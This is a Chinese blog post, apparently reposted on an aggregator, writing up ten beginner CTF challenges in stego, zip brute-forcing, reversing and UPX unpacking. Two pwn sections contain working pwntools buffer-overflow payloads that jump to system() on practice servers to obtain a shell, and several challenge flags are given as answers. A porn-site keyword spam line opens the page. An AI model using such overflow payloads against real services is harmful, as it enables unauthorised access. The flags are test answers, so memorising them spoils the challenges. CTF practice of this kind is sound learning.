日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

11.22 这周的CTF刷题

發布時間:2024/1/18 56 豆豆
生活随笔 收集整理的這篇文章主要介紹了 11.22 这周的CTF刷题 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.你竟然趕我走

給了個jpg

直接放到010editor

拉到最下面就有

flag{stego_is_s0_bor1ing}

?

2.大白

一張png

提示都給了

那么這么說的話直接修改一下圖片長寬高就行

crc校驗的知識可以課后補一下,簡單說就是,圖片會隱含一個crc的一串字符,和圖片大小有關,大小改變,crc隨之改變,通過特殊手段可以只顯示一部分圖片,此時,crc不變,但是圖片大小改變 會報錯。通過腳本即可還原全部圖片

?還原后得到flag

3.有N種方法解決

解壓附件

是一個exe,但是不能運行

kali file 命令識別一下,是一個txt

打開發現是一個base64 但是和圖片ka'l有關系,考base64轉圖片

找個在線網站?

轉換

再用網站掃描一下二維碼就行

?KEY{dca57f966e4e4e31fd5b15417da63269}

4.烏鎮峰會種圖

其實題目不難

是個jpg圖片

我以為要用stegsolve

然后找不到什么線索

然后看了一下照片屬性,發現沒有注釋什么的

才20kb

直接在010editor打開

然后flag就在最后面

5.基礎破解

非常基礎

就是用軟件暴力破解壓縮包密碼

提示已經給了

四位數字

然后就爆破出來了

解壓

得到txt 然后base64解密即可

flag{70354300a5100ba78068805661b93a5c}

6.pwn1_sctf_2016

C++是真的看不懂 難受~~

查了wp

關鍵點是看似沒有棧溢出,但是實則有個repalce的函數可以替換

將I替換成you實現棧溢出 然后再將原來的s重新賦值

總之就是很細節

然后利用棧溢出

加上原本程序里面有個system的函數

然后就編寫payload了

from pwn import * io = remote('node4.buuoj.cn', 29190) payload = b'I'*20 + b'k'*0x4 + p32(0x8048F0D)#發送垃圾字符和函數地址 io.sendline(payload) io.interactive()

7.jarvisoj_level0

一樣的 棧溢出

溢出之后再加上對應的system函數的地址就行

拿到shell權限之后, 再尋找flag的相關文件就可以

上payload

from pwn import * io=remote('node4.buuoj.cn', 25298) payload = b'a'*(0x80+0x8) +p64(0x400596) io.sendline(payload) io.interactive()

?

?

8.reverse 2

還是看wp寫的?

代碼分析有點問題

?wp說的是? 25行 比較輸入值和flag變量,結果為1就輸出 right flag 說明flag變量就是存著flag

的值,然后查看flag

發現就是hacking_for_fun}

但是上面還有一個字符的替換 在第19行到第23行

(這里我根本看不懂 明明這個函數就在上面,為什么會影響到下面的s輸入)

這里替換的機制就是將i和r換成1

所以flag是

flag{hack1ng_fo1_fun}

9.內涵的軟件

ida32打開

?這里有一個DBAPP{49d3c93df25caad81232130f3d2ebfad}

還有非常像flag?

DBAPP替換flag

試一下

flag{49d3c93df25caad81232130f3d2ebfad}

沒想到就直接ok了

有點意外

10、新年快樂

簡單的脫殼

先查殼?

upx殼

使用的工具是??

?upx靜態脫殼工具

脫殼即可

然后分析ida32里的內容

?分析一下就可以

flag{HappyNewYear!}

總結

以上是生活随笔為你收集整理的11.22 这周的CTF刷题的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。